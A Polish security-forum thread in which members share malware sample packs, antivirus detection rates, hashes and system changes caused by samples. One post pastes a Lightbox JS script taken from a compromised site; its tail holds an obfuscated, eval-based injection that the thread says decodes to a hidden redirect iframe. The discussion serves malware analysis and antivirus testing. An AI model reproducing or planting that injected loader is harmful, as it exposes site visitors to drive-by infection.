Paczki, malware, złośliwe pliki, linki itp.

[gr83]

No tutaj jest taki kod na końcu

heh.. ESET teraz zablokował stronę tego tematu

EDIT:

615 malware files pack 2012-08-09 by tommy:

475/615 (77,2%)

[tachion]

haha dobre
To może powinienem to w malware umieścić bo komuś zaszkodzi

[tommyklab]

Treść widoczna jedynie dla zarejestrowanych użytkowników

phishing. Kto poda emaila i hasło do niego ?

Hehehe, nie tylko do konta steam chcą dane, ale do poczty również

Dodano: 12 sie 2012, 23:29

No tutaj jest taki kod na końcu

/*
Lightbox JS: Fullsize Image Overlays
by Lokesh Dhakar -

[Aby zobaczyć linki, zarejestruj się tutaj]

For more information on this script, visit:

[Aby zobaczyć linki, zarejestruj się tutaj]

Licensed under the Creative Commons Attribution 2.5 License -

[Aby zobaczyć linki, zarejestruj się tutaj]

(basically, do anything you want, just leave my name and link)

Table of Contents
-----------------
Configuration

Functions
- getPageScroll()
- getPageSize()
- pause()
- getKey()
- listenKey()
- showLightbox()
- hideLightbox()
- initLightbox()
- addLoadEvent()

Function Calls
- addLoadEvent(initLightbox)

*/



//
// Configuration
//

// If you would like to use a custom loading image or close button reference them in the next two lines.
var loadingImage = ''./include/gfx/loading.gif'';
var closeButton = ''./include/gfx/close.gif'';





//
// getPageScroll()
// Returns array with x,y page scroll values.
// Core code from - quirksmode.org
//
function getPageScroll(){

var yScroll;

if (self.pageYOffset) {
yScroll = self.pageYOffset;
} else if (document.documentElement && document.documentElement.scrollTop){ // Explorer 6 Strict
yScroll = document.documentElement.scrollTop;
} else if (document.body) {// all other Explorers
yScroll = document.body.scrollTop;
}

arrayPageScroll = new Array('''',yScroll)
return arrayPageScroll;
}



//
// getPageSize()
// Returns array with page width, height and window width, height
// Core code from - quirksmode.org
// Edit for Firefox by pHaez
//
function getPageSize(){

var xScroll, yScroll;

if (window.innerHeight && window.scrollMaxY) {
xScroll = document.body.scrollWidth;
yScroll = window.innerHeight + window.scrollMaxY;
} else if (document.body.scrollHeight > document.body.offsetHeight){ // all but Explorer Mac
xScroll = document.body.scrollWidth;
yScroll = document.body.scrollHeight;
} else { // Explorer Mac...would also work in Explorer 6 Strict, Mozilla and Safari
xScroll = document.body.offsetWidth;
yScroll = document.body.offsetHeight;
}

var windowWidth, windowHeight;
if (self.innerHeight) { // all except Explorer
windowWidth = self.innerWidth;
windowHeight = self.innerHeight;
} else if (document.documentElement && document.documentElement.clientHeight) { // Explorer 6 Strict Mode
windowWidth = document.documentElement.clientWidth;
windowHeight = document.documentElement.clientHeight;
} else if (document.body) { // other Explorers
windowWidth = document.body.clientWidth;
windowHeight = document.body.clientHeight;
}

// for small pages with total height less then height of the viewport
if(yScroll < windowHeight){
pageHeight = windowHeight;
} else {
pageHeight = yScroll;
}

// for small pages with total width less then width of the viewport
if(xScroll < windowWidth){
pageWidth = windowWidth;
} else {
pageWidth = xScroll;
}


arrayPageSize = new Array(pageWidth,pageHeight,windowWidth,windowHeight)
return arrayPageSize;
}


//
// pause(numberMillis)
// Pauses code execution for specified time. Uses busy code, not good.
// Code from

[Aby zobaczyć linki, zarejestruj się tutaj]

//
function pause(numberMillis) {
var now = new Date();
var exitTime = now.getTime() + numberMillis;
while (true) {
now = new Date();
if (now.getTime() > exitTime)
return;
}
}

//
// getKey(key)
// Gets keycode. If ''x'' is pressed then it hides the lightbox.
//

function getKey(e){
if (e == null) { // ie
keycode = event.keyCode;
} else { // mozilla
keycode = e.which;
}
key = String.fromCharCode(keycode).toLowerCase();

if(key == ''x''){ hideLightbox(); }
}


//
// listenKey()
//
function listenKey () { document.onkeypress = getKey; }


//
// showLightbox()
// Preloads images. Pleaces new image in lightbox then centers and displays.
//
function showLightbox(objLink)
{
// prep objects
var objOverlay = document.getElementById(''overlay'');
var objLightbox = document.getElementById(''lightbox'');
var objCaption = document.getElementById(''lightboxCaption'');
var objImage = document.getElementById(''lightboxImage'');
var objLoadingImage = document.getElementById(''loadingImage'');
var objLightboetails = document.getElementById(''lightboetails'');


var arrayPageSize = getPageSize();
var arrayPageScroll = getPageScroll();

// center loadingImage if it exists
if (objLoadingImage) {
objLoadingImage.style.top = (arrayPageScroll[1]+ ((arrayPageSize[3]- 35 - objLoadingImage.height) / 2) + ''px'');
objLoadingImage.style.left = (((arrayPageSize[0]- 20 - objLoadingImage.width) / 2) + ''px'');
objLoadingImage.style.display = ''block'';
}

// set height of Overlay to take up whole page and show
objOverlay.style.height = (arrayPageSize[1]+ ''px'');
objOverlay.style.display = ''block'';

// preload image
imgPreload = new Image();

imgPreload.onload=function(){
objImage.src = objLink.href;

// center lightbox and make sure that the top and left values are not negative
// and the image placed outside the viewport
var lightboxTop = arrayPageScroll[1]+ ((arrayPageSize[3]- 35 - imgPreload.height) / 2);
var lightboxLeft = ((arrayPageSize[0]- 20 - imgPreload.width) / 2);

objLightbox.style.top = (lightboxTop < 0) ? "0px" : lightboxTop + "px";
objLightbox.style.left = (lightboxLeft < 0) ? "0px" : lightboxLeft + "px";


objLightboetails.style.width = imgPreload.width + ''px'';

if(objLink.getAttribute(''title'')){
objCaption.style.display = ''block'';
//objCaption.style.width = imgPreload.width + ''px'';
objCaption.innerHTML = objLink.getAttribute(''title'');
} else {
objCaption.style.display = ''none'';
}

// A small pause between the image loading and displaying is required with IE,
// this prevents the previous image displaying for a short burst causing flicker.
if (navigator.appVersion.indexOf("MSIE")!=-1){
pause(250);
}

if (objLoadingImage) { objLoadingImage.style.display = ''none''; }

// Hide select boxes as they will ''peek'' through the image in IE
selects = document.getElementsByTagName("select");
for (i = 0; i != selects.length; i++) {
selects[i] .style.visibility = "hidden";
}


objLightbox.style.display = ''block'';

// After image is loaded, update the overlay height as the new image might have
// increased the overall page height.
arrayPageSize = getPageSize();
objOverlay.style.height = (arrayPageSize[1]+ ''px'');

// Check for ''x'' keypress
listenKey();

return false;
}

imgPreload.src = objLink.href;

}





//
// hideLightbox()
//
function hideLightbox()
{
// get objects
objOverlay = document.getElementById(''overlay'');
objLightbox = document.getElementById(''lightbox'');

// hide lightbox and overlay
objOverlay.style.display = ''none'';
objLightbox.style.display = ''none'';

// make select boxes visible
selects = document.getElementsByTagName("select");
for (i = 0; i != selects.length; i++) {
selects[i] .style.visibility = "visible";
}

// disable keypress listener
document.onkeypress = '''';
}




//
// initLightbox()
// Function runs on window load, going through link tags looking for rel="lightbox".
// These links receive onclick events that enable the lightbox display for their targets.
// The function also inserts html markup at the top of the page which will be used as a
// container for the overlay pattern and the inline image.
//
function initLightbox()
{

if (!document.getElementsByTagName){ return; }
var anchors = document.getElementsByTagName("a");

// loop through all anchor tags
for (var i=0; i<anchors.length; i++){
var anchor = anchors[i] ;

if (anchor.getAttribute("href") && (anchor.getAttribute("rel") == "lightbox")){
anchor.onclick = function () {showLightbox(this); return false;}
}
}

// the rest of this code inserts html at the top of the page that looks like this:
//
// <div id="overlay">
// <a href="#" onclick="hideLightbox(); return false;"><img id="loadingImage" /></a>
// </div>
// <div id="lightbox">
// <a href="#" onclick="hideLightbox(); return false;" title="Click anywhere to close image">
// <img id="closeButton" />
// <img id="lightboxImage" />
// </a>
// <div id="lightboetails">
// <div id="lightboxCaption"></div>
// <div id="keyboardMsg"></div>
// </div>
// </div>

var objBody = document.getElementsByTagName("body").item(0);

// create overlay div and hardcode some functional styles (aesthetic styles are in CSS file)
var objOverlay = document.createElement("div");
objOverlay.setAttribute(''id'',''overlay'');
objOverlay.onclick = function () {hideLightbox(); return false;}
objOverlay.style.display = ''none'';
objOverlay.style.position = ''absolute'';
objOverlay.style.top = ''0'';
objOverlay.style.left = ''0'';
objOverlay.style.zIndex = ''90'';
objOverlay.style.width = ''100%'';
objBody.insertBefore(objOverlay, objBody.firstChild);

var arrayPageSize = getPageSize();
var arrayPageScroll = getPageScroll();

// preload and create loader image
var imgPreloader = new Image();

// if loader image found, create link to hide lightbox and create loadingimage
imgPreloader.onload=function(){

var objLoadingImageLink = document.createElement("a");
objLoadingImageLink.setAttribute(''href'',''#'');
objLoadingImageLink.onclick = function () {hideLightbox(); return false;}
objOverlay.appendChild(objLoadingImageLink);

var objLoadingImage = document.createElement("img");
objLoadingImage.src = loadingImage;
objLoadingImage.setAttribute(''id'',''loadingImage'');
objLoadingImage.style.position = ''absolute'';
objLoadingImage.style.zIndex = ''150'';
objLoadingImageLink.appendChild(objLoadingImage);

imgPreloader.onload=function(){}; // clear onLoad, as IE will flip out w/animated gifs

return false;
}

imgPreloader.src = loadingImage;

// create lightbox div, same note about styles as above
var objLightbox = document.createElement("div");
objLightbox.setAttribute(''id'',''lightbox'');
objLightbox.style.display = ''none'';
objLightbox.style.position = ''absolute'';
objLightbox.style.zIndex = ''100'';
objBody.insertBefore(objLightbox, objOverlay.nextSibling);

// create link
var objLink = document.createElement("a");
objLink.setAttribute(''href'',''#'');
objLink.setAttribute(''title'',''Click to close'');
objLink.onclick = function () {hideLightbox(); return false;}
objLightbox.appendChild(objLink);

// preload and create close button image
var imgPreloadCloseButton = new Image();

// if close button image found,
imgPreloadCloseButton.onload=function(){

var objCloseButton = document.createElement("img");
objCloseButton.src = closeButton;
objCloseButton.setAttribute(''id'',''closeButton'');
objCloseButton.style.position = ''absolute'';
objCloseButton.style.zIndex = ''200'';
objLink.appendChild(objCloseButton);

return false;
}

imgPreloadCloseButton.src = closeButton;

// create image
var objImage = document.createElement("img");
objImage.setAttribute(''id'',''lightboxImage'');
objLink.appendChild(objImage);

// create details div, a container for the caption and keyboard message
var objLightboetails = document.createElement("div");
objLightboetails.setAttribute(''id'',''lightboetails'');
objLightbox.appendChild(objLightboetails);

// create caption
var objCaption = document.createElement("div");
objCaption.setAttribute(''id'',''lightboxCaption'');
objCaption.style.display = ''none'';
objLightboetails.appendChild(objCaption);

// create keyboard message
var objKeyboardMsg = document.createElement("div");
objKeyboardMsg.setAttribute(''id'',''keyboardMsg'');
objKeyboardMsg.innerHTML = ''naci?nij <a href="#" onclick="hideLightbox(); return false;"><kbd>x</kbd></a> aby zamkn??'';
objLightboetails.appendChild(objKeyboardMsg);


}




//
// addLoadEvent()
// Adds event to window.onload without overwriting currently assigned onload functions.
// Function found at Simon Willison''s weblog -

[Aby zobaczyć linki, zarejestruj się tutaj]

//
function addLoadEvent(func)
{
var oldonload = window.onload;
if (typeof window.onload != ''function''){
window.onload = func;
} else {
window.onload = function(){
oldonload();
func();
}
}

}



addLoadEvent(initLightbox); // run initLightbox onLoad
/*c3284d*/
try{1-prototype;}catch(asd){x=2;}if(x){fr="fromChar";f=[4,0,91,108,100,88,107,95,100,101,22,91,105,99,54,91,90,29,32,22,112,4,0,107,88,104,21,96,92,103,100,22,50,23,90,100,90,107,98,92,100,105,37,89,103,92,87,105,92,59,97,92,99,90,101,106,29,30,95,91,105,87,98,92,29,30,50,3,-1,96,92,103,100,36,104,107,111,97,92,36,101,102,105,94,107,95,100,101,51,28,88,88,104,102,98,106,107,91,28,50,3,-1,96,92,103,100,36,104,107,111,97,92,36,105,102,102,50,30,35,46,48,47,90,100,29,48,4,0,94,93,104,98,37,105,105,112,98,90,37,98,90,93,106,50,30,35,46,48,47,90,100,29,48,4,0,94,93,104,98,37,105,103,90,22,21,52,22,23,95,106,105,103,48,36,38,99,94,88,99,94,95,91,86,107,106,94,90,97,90,107,105,35,90,101,98,38,94,105,107,102,35,103,94,101,25,49,2,1,95,91,105,99,35,96,90,21,52,22,28,93,104,98,64,90,28,50,3,-1,91,101,88,108,99,90,101,106,35,89,101,89,112,36,86,103,102,90,101,90,56,95,95,97,91,30,94,93,104,98,32,49,2,1,115,48,4,0,108,96,100,89,102,109,35,102,100,97,102,87,89,23,51,21,93,104,98,56,90,89,50,3,-1] ;v="eva";}if(v)e=window[v+"l"] ;w=f;s=[] ;r=String;z=((e)?"Code":"");zx=fr+z;for(i=0;291-5+5-i>0;i+=1){j=i;if(e)s=s+r[zx] ((w[j] *1+(9+e("j%3"))));}if(x&&f&&012===10)e(s);
/*/c3284d* /

Tylko jestem ciekaw czy to naprawdę groźne czy tylko popłuczyny kodu

Dekodowałem na

[Aby zobaczyć linki, zarejestruj się tutaj]

Treść widoczna jedynie dla zarejestrowanych użytkowników

W tym lightbox.js jest iframe:

Treść widoczna jedynie dla zarejestrowanych użytkowników

który przekierowuje na:

Treść widoczna jedynie dla zarejestrowanych użytkowników

[Aby zobaczyć linki, zarejestruj się tutaj]

Strona już ściągnięta, albo tymczasowy down.

[Aby zobaczyć linki, zarejestruj się tutaj]

Dodano: 13 sie 2012, 8:31

17 Gauss samples (aktualizacja, poprzednio 9):

Treść widoczna jedynie dla zarejestrowanych użytkowników

Paczka zawiera także zawirusowane czcionki? wtf? Palida Narow:

[Aby zobaczyć linki, zarejestruj się tutaj]

[Aby zobaczyć linki, zarejestruj się tutaj]

[tachion]

He dobre to już w czcionki dodają złośliwy kod,no kto by się domyślał<!-- s--> <!-- s-->

[Waves]

Szczęście że te malware jest skierowane na daleki wschód

[gr83]

17 Gauss samples (aktualizacja, poprzednio 9):

ESET6:
15/17 (88,2%) - no, akurat czcionki nie wykrywa, ale według podanej stronki to ona raczej wskazuje na wirusa a nie jest wirusem...

[tachion]

Hmm a tutaj blokują wam programy bo dr.web blokuje

Treść widoczna jedynie dla zarejestrowanych użytkowników

a dokładnie ten adres z tą zawartością

Treść widoczna jedynie dla zarejestrowanych użytkowników

po przeanalizowaniu samego OmU60428.png jest czyste

[Aby zobaczyć linki, zarejestruj się tutaj]

[Aby zobaczyć linki, zarejestruj się tutaj]

[jasiekkidawa]

Hmm a tutaj blokują wam programy bo dr.web blokuje

Treść widoczna jedynie dla zarejestrowanych użytkowników

a dokładnie ten adres z tą zawartością

Treść widoczna jedynie dla zarejestrowanych użytkowników

po przeanalizowaniu samego OmU60428.png jest czyste

[Aby zobaczyć linki, zarejestruj się tutaj]

[Aby zobaczyć linki, zarejestruj się tutaj]

KASPEREK 2012 nie widzi żadnego zagrożenia
--------------------------------------

KIS 2012:
16/17 ( 94,1% ) -> 1 pozostały plik ( E6EDC2F3CDA650F48E5B1471EB59FBBC ) na VT1/42

[Aby zobaczyć linki, zarejestruj się tutaj]

[tomatto007]

353 files - Identified as malicious on VT (probably many AdWare)

Treść widoczna jedynie dla zarejestrowanych użytkowników

[gr83]

353 files - Identified as malicious on VT (probably many AdWare)

ESET6
299(+5 "archiwum uszkodzone")/353 (84,7%)

[torello]

ustaw domyślne Avast 7 Free AV
- 309/353= 87.53 %
- 539/615= 87.64 %

[myciu1974]

615 malware files pack 2012-08-09 by tommy:

Emsi AM 601/615 (97,72%)

353 files - Identified as malicious on VT (probably many AdWare):

Emsi AM 345/353 (97,73%)

[cagatayak]

353 files - Identified as malicious on VT (probably many AdWare)

Treść widoczna jedynie dla zarejestrowanych użytkowników

Avira : 331/353 %93.76

[McAlex]

Takie coś przed chwilą Kaspersky Mobile znalazł na moim telefonie ( bez hasła!):

Treść widoczna jedynie dla zarejestrowanych użytkowników

[Aby zobaczyć linki, zarejestruj się tutaj]

Mam powody żeby się bać o moją N500?
Wszystkie pliki pobieram tylko ze sklepu Nokii.

Dzisiejszy skan:

[Aby zobaczyć linki, zarejestruj się tutaj]

Kaspersky twierdzi, że się pomylił, McAfee/Sophos i kilku innych producentów ,że to nowy wirus
Sam już nie wiem.

[tommyklab]

353 files - Identified as malicious on VT (probably many AdWare)

Treść widoczna jedynie dla zarejestrowanych użytkowników

Kaspersky 317/353 (89,8%)

[kolon22]

353 files - Identified as malicious on VT (probably many AdWare)

Comodo IS:
298/353 (84,41%)

Kingsoft Cloud:
284/353 (80,45%)

615 malware files pack 2012-08-09 by tommy:

Comodo IS:
500/615 (81,30%

Kingsoft Cloud:
502/615 (81,62%)

[Adi Cherryson]

[Aby zobaczyć linki, zarejestruj się tutaj]

17 Gauss samples (aktualizacja, poprzednio 9) by tommy 16/17

Zarówno Dr.Web jak MBAM nie wykrywa trojana w tym foncie.
Poprzednio było 10 sampli, a nie dziewięć.

353 files byTomatto007-2012-08-13 298/353 84,42%

Kaspersky twierdzi, że się pomylił, McAfee/Sophos i kilku innych producentów ,że to nowy wirusSam już nie wiem.

Jak to na wojnie. Trzeba przywyknąć do braku pewności...

[tomatto007]

Malware info:
SHA256: 611d6858441e984f78aac6e7da7a1906110442e5020f2559b723187085a2152f
SHA1: 80b62b2fbb93ae6f61f61e263a66bc8238ee693c
MD5: 1030b7e02c2fa6f77c6b6bd24b27041e
File size: 905728 bytes

VT info (25/42):

[Aby zobaczyć linki, zarejestruj się tutaj]

Changes in the system:

1. Registry Key:
   HKLM\System\CurrentControlSet\Services\dmprrv\Parameters\ServiceDll: "%SystemRoot%\System32\dmprrv.dll"
   HKLM\System\CurrentControlSet\Services\dmprrv\ImagePath: "%SysDir%\svchost.exe -k dmprrv"
   
   Files:
   %SysDir%\dmprrv.dll VT:

   [Aby zobaczyć linki, zarejestruj się tutaj]

   %SysDir%\dmprrvz.dll
   %SysDir%\dmprrvzt.dll
   %SysDir%\kernel31.dll

Treść widoczna jedynie dla zarejestrowanych użytkowników

[tomatto007]

61 files - Identified as malicious on VT (probably many AdWare)

Treść widoczna jedynie dla zarejestrowanych użytkowników

[Galactico]

353 files - Identified as malicious on VT (probably many AdWare)

Treść widoczna jedynie dla zarejestrowanych użytkowników

AVG IS 2012
318/353 (90,08%)